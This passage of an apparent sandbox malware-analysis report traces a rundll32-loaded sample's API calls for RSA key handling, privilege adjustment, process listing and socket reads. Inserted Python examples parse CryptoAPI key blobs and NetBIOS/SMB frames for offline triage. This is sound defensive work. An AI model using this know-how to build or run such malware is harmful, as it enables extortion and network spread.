                                                • CryptExportKey.ADVAPI32(?,?,00000001,00000000,00000000,?,?,02E51D54,F0000000,?), ref: 02E51CCC
                                                • CryptBinaryToStringW.CRYPT32(02E51D54,?,00000001,00000000,F0000000), ref: 02E51CE8
                                                • LocalAlloc.KERNEL32(00000040,F0000000,?,02E51D54,F0000000,?), ref: 02E51CF6
                                                • CryptBinaryToStringW.CRYPT32(02E51D54,?,00000001,00000000,F0000000), ref: 02E51D0F
                                                • LocalFree.KERNEL32(00000000,?,02E51D54,F0000000,?), ref: 02E51D1B
                                                • LocalFree.KERNEL32(02E51D54,?,02E51D54,F0000000,?), ref: 02E51D24
                                                Strings
                                                • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 02E51C85
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CryptLocal$AllocBinaryExportFreeString
                                                • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                • API String ID: 402867008-63410773
                                                • Opcode ID: dfa63c54878e37b70e82e9a901dd9d7aa7607e1fc33f2a82199928518a97081e
                                                • Instruction ID: d791df283de6307ab02d78b630514397df0c2ae3901508ed185eaf2b5bf949d2
                                                • Opcode Fuzzy Hash: dfa63c54878e37b70e82e9a901dd9d7aa7607e1fc33f2a82199928518a97081e
                                                • Instruction Fuzzy Hash: E7217F7699021CFFEF109FE1DC80EAEBBB9EB04754F108465FA11A6150D7719E509B21
                                                Uniqueness

                                                Uniqueness Score: -1.00%
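The two CryptoAPI chains in this report, the import in subcall 02E51BA0 (CryptStringToBinaryW of the embedded base64 key, CryptDecodeObjectEx with structure type 0x13, CryptImportKey) and the export in 02E51C7F above (CryptExportKey with blob type 1, then CryptBinaryToStringW), move RSA material between three encodings: PKCS#1 DER, the CAPI PUBLICKEYBLOB, and the CAPI SIMPLEBLOB. The following is an added example, not code from the report, Joe Sandbox, or the sample, that reimplements those conversions in pure Python so an analyst can inspect such a key offline. Structure type 0x13 is RSA_CSP_PUBLICKEYBLOB, blob type 1 is SIMPLEBLOB, and the blob layouts follow the documented BLOBHEADER/RSAPUBKEY structures; the 512-bit key and the SIMPLEBLOB used for the demo are constructed here and the function names are this example's own. The sample's key is truncated in the report and is not reproduced; only its first twelve characters, which fix the modulus size, are used.

```python
import base64
import struct

# --- PKCS#1 RSAPublicKey DER: what the base64 "MIIBCgKCAQEA..." in the trace encodes ---

def der_len(n: int) -> bytes:
    """DER length octets: short form below 128, long form above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def der_int(v: int) -> bytes:
    body = v.to_bytes(max(1, (v.bit_length() + 7) // 8), "big")
    if body[0] & 0x80:
        body = b"\x00" + body  # leading zero keeps the INTEGER positive
    return b"\x02" + der_len(len(body)) + body

def pkcs1_rsa_public_key(n: int, e: int) -> bytes:
    """RFC 8017 RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER }."""
    inner = der_int(n) + der_int(e)
    return b"\x30" + der_len(len(inner)) + inner

def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, next_pos) for the DER element at buf[pos]."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length

def parse_pkcs1_public_key(der: bytes):
    tag, seq, _ = _read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("expected SEQUENCE")
    tag_n, n_bytes, pos = _read_tlv(seq, 0)
    tag_e, e_bytes, _ = _read_tlv(seq, pos)
    if tag_n != 0x02 or tag_e != 0x02:
        raise ValueError("expected INTEGER modulus and exponent")
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")

def modulus_bits_from_prefix(b64_prefix: str) -> int:
    """Modulus size from only the start of a base64 PKCS#1 key: the SEQUENCE and
    first INTEGER headers are enough, so a truncated key string still answers."""
    raw = base64.b64decode(b64_prefix[: len(b64_prefix) // 4 * 4])
    if raw[0] != 0x30:
        raise ValueError("expected SEQUENCE")
    pos = 2 + ((raw[1] & 0x7F) if raw[1] & 0x80 else 0)  # skip SEQUENCE header
    if raw[pos] != 0x02:
        raise ValueError("expected INTEGER")
    if raw[pos + 1] & 0x80:
        nb = raw[pos + 1] & 0x7F
        ilen = int.from_bytes(raw[pos + 2:pos + 2 + nb], "big")
        first = raw[pos + 2 + nb]
    else:
        ilen, first = raw[pos + 1], raw[pos + 2]
    return (ilen - 1 if first == 0x00 else ilen) * 8  # drop the sign byte

# --- CAPI blobs: CryptDecodeObjectEx(RSA_CSP_PUBLICKEYBLOB) output, CryptImportKey input ---
PUBLICKEYBLOB, SIMPLEBLOB, CUR_BLOB_VERSION = 0x06, 0x01, 0x02
CALG_RSA_KEYX = 0x0000A400
RSA1_MAGIC = 0x31415352  # "RSA1"

def to_capi_publickeyblob(n: int, e: int) -> bytes:
    """BLOBHEADER (8 bytes) + RSAPUBKEY (12 bytes) + modulus in little-endian order."""
    bitlen = (n.bit_length() + 7) // 8 * 8
    header = struct.pack("<BBHI", PUBLICKEYBLOB, CUR_BLOB_VERSION, 0, CALG_RSA_KEYX)
    rsapubkey = struct.pack("<III", RSA1_MAGIC, bitlen, e)
    return header + rsapubkey + n.to_bytes(bitlen // 8, "little")

def parse_capi_publickeyblob(blob: bytes):
    btype, _ver, _res, alg = struct.unpack_from("<BBHI", blob, 0)
    magic, bitlen, e = struct.unpack_from("<III", blob, 8)
    if btype != PUBLICKEYBLOB or alg != CALG_RSA_KEYX or magic != RSA1_MAGIC:
        raise ValueError("not an RSA1 PUBLICKEYBLOB")
    return int.from_bytes(blob[20:20 + bitlen // 8], "little"), e, bitlen

def parse_capi_simpleblob(blob: bytes):
    """CryptExportKey(..., SIMPLEBLOB) output: BLOBHEADER carrying the session key
    ALG_ID, then the ALG_ID of the wrapping key-exchange algorithm, then the
    RSA-encrypted session key in little-endian order. Parsed only; decrypting it
    needs the private key that stays with the operator."""
    btype, _ver, _res, key_alg = struct.unpack_from("<BBHI", blob, 0)
    (enc_alg,) = struct.unpack_from("<I", blob, 8)
    if btype != SIMPLEBLOB:
        raise ValueError("not a SIMPLEBLOB")
    return key_alg, enc_alg, int.from_bytes(blob[12:], "little")

def decode_embedded_key(b64: str) -> bytes:
    """CryptStringToBinaryW(CRYPT_STRING_BASE64) followed by CryptDecodeObjectEx(..., 0x13)."""
    n, e = parse_pkcs1_public_key(base64.b64decode(b64))
    return to_capi_publickeyblob(n, e)

# Constructed 512-bit demo key (not the sample's key, which the report truncates).
DEMO_E = 65537
DEMO_N = (1 << 511) | 0x1F3A5C7E9B2D4F6183
DEMO_B64 = base64.b64encode(pkcs1_rsa_public_key(DEMO_N, DEMO_E)).decode()
SAMPLE_KEY_PREFIX = "MIIBCgKCAQEA"  # first 12 characters of the key string in the trace
```

The prefix check is the useful triage step: "MIIBCgKCAQEA" decodes to a SEQUENCE of 0x10A bytes whose first INTEGER is 0x101 bytes with a leading sign byte, so the embedded key is a 2048-bit modulus regardless of the truncation. The SIMPLEBLOB parser matches the base64 string the export chain writes into README.TXT: with a 2048-bit wrapping key, the ciphertext field is 256 bytes, which is why that string is far longer than an AES key.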

                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000028,?,?,00000000), ref: 02E581DE
                                                • OpenProcessToken.ADVAPI32(00000000,?,00000000), ref: 02E581E5
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 02E581F7
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 02E5821A
                                                • GetLastError.KERNEL32(?,00000000), ref: 02E58222
                                                • SetLastError.KERNEL32(?,?,00000000), ref: 02E58234
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                • String ID:
                                                • API String ID: 2365211911-0
                                                • Opcode ID: 494dbc1f7dbd13a8168675a971af7762006b1b98ad07bc13430c6bca42272c1e
                                                • Instruction ID: 2bc7376ebe980eb0b0bcb74bdc7a411e0a36c8985c4c73ed1fa7dc5c39a86891
                                                • Opcode Fuzzy Hash: 494dbc1f7dbd13a8168675a971af7762006b1b98ad07bc13430c6bca42272c1e
                                                • Instruction Fuzzy Hash: ED110975A91228BFDB009FE6DD889EFBFBCEF08644F504425FA05E2100D7708A958BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02E58688
                                                • Process32FirstW.KERNEL32(?,?), ref: 02E586AE
                                                • Process32NextW.KERNEL32(?,0000022C), ref: 02E5873B
                                                • CloseHandle.KERNEL32(?), ref: 02E5874F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                • String ID: DK!.
                                                • API String ID: 420147892-431254139
                                                • Opcode ID: f013feef72d4bfcd93afb09528160df5d680ba326e7d36186a61d6dd10844ffe
                                                • Instruction ID: bf88028e0e3ebad233b7f43715f2ce2d806fd22a01e4ac5494639f825d9a1ed1
                                                • Opcode Fuzzy Hash: f013feef72d4bfcd93afb09528160df5d680ba326e7d36186a61d6dd10844ffe
                                                • Instruction Fuzzy Hash: C721D335D50329ABCB20DBA8CD887DDBBB4EB14368F2492A5EC52D61A0D7704BC1CA10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
                                                • API String ID: 0-3089872807
                                                • Opcode ID: 6c568800db317edcb17d2bacf16eeddf42be6f4608f02650d835aed94363a355
                                                • Instruction ID: 4f33faa2687bbcdebeb9b7c8c462fb69c224878c990ffef565adccbcfafbc61c
                                                • Opcode Fuzzy Hash: 6c568800db317edcb17d2bacf16eeddf42be6f4608f02650d835aed94363a355
                                                • Instruction Fuzzy Hash: 08122972A683614FCB14CE38C5A425ABBE1BB84358F64F62EEC96D3B01D375E944C781
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 02E567C7
                                                • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02E56803
                                                • recv.WS2_32(00000000,00000000,00000000,00000000), ref: 02E5681D
                                                • htons.WS2_32(?), ref: 02E56832
                                                • recv.WS2_32(00000000,?,?,00000000), ref: 02E5686A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: recv$htonsmemsetselect
                                                • String ID:
                                                • API String ID: 2017298870-0
                                                • Opcode ID: ddc9edf0e861f0354a1f9f78d2370c2601ba975897c9500b82783fd55b80db55
                                                • Instruction ID: 9fa9f9cce9abf078dd7418fc231bfb28272f3a8f342734c263a0bd5e50441737
                                                • Opcode Fuzzy Hash: ddc9edf0e861f0354a1f9f78d2370c2601ba975897c9500b82783fd55b80db55
                                                • Instruction Fuzzy Hash: B5210275590224ABCB248F69CC48BFE7BB9EF94308F50895AF885CB190E7788990CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%
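The select, recv, htons, recv sequence in the function above is the shape of a length-prefixed frame reader: wait until the socket is readable, pull a fixed-size header, byte-swap a 16-bit length field, then read exactly that many payload bytes. Because the argument columns in the trace are stack snapshots, the header size and the exact field being swapped are not visible; the example below assumes the NetBIOS session service framing that SMB uses over TCP/445 (one type byte, a 3-byte big-endian length, then the SMB message), which matches the SMBv1 spreading the report flags elsewhere. It is an added example, not code from the report or the sample, and the demo frames are constructed here. It also shows the two failure modes a reader of this kind has to handle: a peer that stalls (select timeout) and a peer that closes mid-frame (short read).

```python
import select
import socket

def recv_exact(sock: socket.socket, n: int, timeout: float = 5.0) -> bytes:
    """recv() until exactly n bytes have arrived, waiting with select() as the
    trace does; a stalled or closed peer raises instead of returning a short read."""
    buf = bytearray()
    while len(buf) < n:
        readable, _, _ = select.select([sock], [], [], timeout)
        if not readable:
            raise TimeoutError(f"peer stalled after {len(buf)} of {n} bytes")
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError(f"peer closed after {len(buf)} of {n} bytes")
        buf += chunk
    return bytes(buf)

NETBIOS_MAX_LEN = 0x1FFFF  # 17-bit length field of the direct-TCP (port 445) variant

def recv_netbios_frame(sock: socket.socket, timeout: float = 5.0):
    """Assumed framing: 1 message-type byte, 3-byte big-endian length, then payload.
    Returns (message_type, payload)."""
    hdr = recv_exact(sock, 4, timeout)
    length = int.from_bytes(hdr[1:4], "big")  # the byte swap htons/ntohs performs on x86
    if length > NETBIOS_MAX_LEN:
        raise ValueError(f"declared length {length} exceeds NetBIOS maximum")
    return hdr[0], recv_exact(sock, length, timeout)

def netbios_frame(payload: bytes) -> bytes:
    """Sender side of the same framing, used here only to build demo traffic."""
    if len(payload) > NETBIOS_MAX_LEN:
        raise ValueError("payload too large for one NetBIOS session frame")
    return b"\x00" + len(payload).to_bytes(3, "big") + payload

# Constructed SMBv1 header start: protocol id, command 0x72 (SMB_COM_NEGOTIATE), padding.
DEMO_PAYLOAD = b"\xffSMB\x72" + b"\x00" * 27 + b"constructed dialect list"

def demo_roundtrip():
    """Frame delivered in two pieces to show recv_exact reassembling it."""
    a, b = socket.socketpair()
    try:
        frame = netbios_frame(DEMO_PAYLOAD)
        a.sendall(frame[:6])
        a.sendall(frame[6:])
        return recv_netbios_frame(b, timeout=2.0)
    finally:
        a.close()
        b.close()

def demo_truncated() -> str:
    """Header promises 100 bytes, only 10 arrive, then the peer closes."""
    a, b = socket.socketpair()
    try:
        a.sendall(b"\x00" + (100).to_bytes(3, "big") + b"\x41" * 10)
        a.close()
        try:
            recv_netbios_frame(b, timeout=2.0)
            return "short read accepted"
        except ConnectionError:
            return "closed mid-frame"
    finally:
        b.close()
```

The length bound is the check worth carrying into detection or emulation code: a recv loop that trusts the swapped length without a ceiling will allocate and block on whatever a peer declares, which is exactly the class of behaviour the SMBv1 shellcode the report detects relies on.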

                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000000,000001FF,?,?,02E515BA,00000000,0000003C,00000000,?,00000000), ref: 02E5143D
                                                • GetLastError.KERNEL32(?,?,02E515BA,00000000,0000003C,00000000,?,00000000), ref: 02E51457
                                                • CryptGenRandom.ADVAPI32(00000000,00000000,?,?,?,02E515BA,00000000,0000003C,00000000,?,00000000), ref: 02E51473
                                                • GetLastError.KERNEL32(?,?,02E515BA,00000000,0000003C,00000000,?,00000000), ref: 02E5147D
                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,00000000,0000003C,00000000,?), ref: 02E5149A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$ContextErrorLast$AcquireRandomRelease
                                                • String ID:
                                                • API String ID: 236824231-0
                                                • Opcode ID: fb2b4e7e91d9624a6a70427709c947020e242b61729c6d7674040ca1df92fac5
                                                • Instruction ID: 804a7202b35a72a056268dfe788e5ac7ba700ece010997a3a0c0c6846ad26f23
                                                • Opcode Fuzzy Hash: fb2b4e7e91d9624a6a70427709c947020e242b61729c6d7674040ca1df92fac5
                                                • Instruction Fuzzy Hash: 49017575AA0326BFDB109BA6DD45B9B3BA9EF04398F60A461FA05D6100D730C9509750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8eb6e04be073383a7848f727263850b8b71c3d24ade767951a895af7bf953f24
                                                • Instruction ID: 0a24d39b9eeb0c6892f3872a906859be530691a7f6293dfc3b1f09b393d98128
                                                • Opcode Fuzzy Hash: 8eb6e04be073383a7848f727263850b8b71c3d24ade767951a895af7bf953f24
                                                • Instruction Fuzzy Hash: 87424970A506249FDF18CF59C8946AEBBF2BF88308F14D6A9EC159B349D774DA40CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 02E51000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,02E5271B,00000062,0000FEFF,?,02CE5020,000001BD), ref: 02E51008
                                                  • Part of subcall function 02E51000: HeapAlloc.KERNEL32(00000000,?,02E5271B,00000062,0000FEFF,?,02CE5020,000001BD), ref: 02E5100F
                                                • htons.WS2_32(-000000FC), ref: 02E5247E
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocProcesshtons
                                                • String ID:
                                                • API String ID: 1354327697-0
                                                • Opcode ID: c64c2fc2f62054c7999bc198966c55c7cf73a0cd7410818a80a623e44e35809b
                                                • Instruction ID: efb050f9df5bad538641405c794cb68e8068136a32dcca18559f89cc45fadc11
                                                • Opcode Fuzzy Hash: c64c2fc2f62054c7999bc198966c55c7cf73a0cd7410818a80a623e44e35809b
                                                • Instruction Fuzzy Hash: 7C011D2C050B969AC7209FA4C4006D7BBB0EF19750B009A0EFDADD7B51E330D955CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: -
                                                • API String ID: 0-2547889144
                                                • Opcode ID: 264c4a9f84c94ddb469add652ad46e45e4ab2030dd98d8d844247b2185d83b53
                                                • Instruction ID: 48991b29c157c9cc5bdbcc7bf725039cda8228e42023b7833d61bc74b74dc00f
                                                • Opcode Fuzzy Hash: 264c4a9f84c94ddb469add652ad46e45e4ab2030dd98d8d844247b2185d83b53
                                                • Instruction Fuzzy Hash: 8A4138368A827147DB2CCA59C0407BEB6A36FDC30CF59E1BACE0A1B245DB714987C295
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3261ce101a4ddf80537a8d77e909f4128732bfcff0c3432a6bd02ab708136fc5
                                                • Instruction ID: b2f5598549fe5cb3f9d090cd6682a4bac118082f421e54042dac652df2746dd1
                                                • Opcode Fuzzy Hash: 3261ce101a4ddf80537a8d77e909f4128732bfcff0c3432a6bd02ab708136fc5
                                                • Instruction Fuzzy Hash: 21625B71E506249FCF18CF59C8906ADBBF2FF84318B1491AEDC56AB389D7749A40CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e2134b6c4d94fc1a920cb20b85918491cebd6ce19787d368ec8a3bedd81c72a0
                                                • Instruction ID: 1ae259945d1d5ba69b2740514a195bae063592c1c5e443cc346fd8c40f37ec72
                                                • Opcode Fuzzy Hash: e2134b6c4d94fc1a920cb20b85918491cebd6ce19787d368ec8a3bedd81c72a0
                                                • Instruction Fuzzy Hash: 09719571BF06694BD72CCE1FECD05367362E78D30078A8E79DA0687746C635A671CAA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountTick
                                                • String ID:
                                                • API String ID: 536389180-0
                                                • Opcode ID: 7264c2d340a83b43ce87e55edd08f45daa51ce9748ef29fb57478e23bd97aa35
                                                • Instruction ID: e88e521fe0a8a15cf569d9f19e6efd361f028518fba2d3ef884f7a4fdeac32b0
                                                • Opcode Fuzzy Hash: 7264c2d340a83b43ce87e55edd08f45daa51ce9748ef29fb57478e23bd97aa35
                                                • Instruction Fuzzy Hash: FC312330AA1BA4AEEB21DF38C4047DBBBF5AF06354F10DA5DE9E99B381C33155408B94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 02E51BA0: CryptStringToBinaryW.CRYPT32(89FF33FF,00000000,00000001,00000000,?,00000000,00000000), ref: 02E51BC6
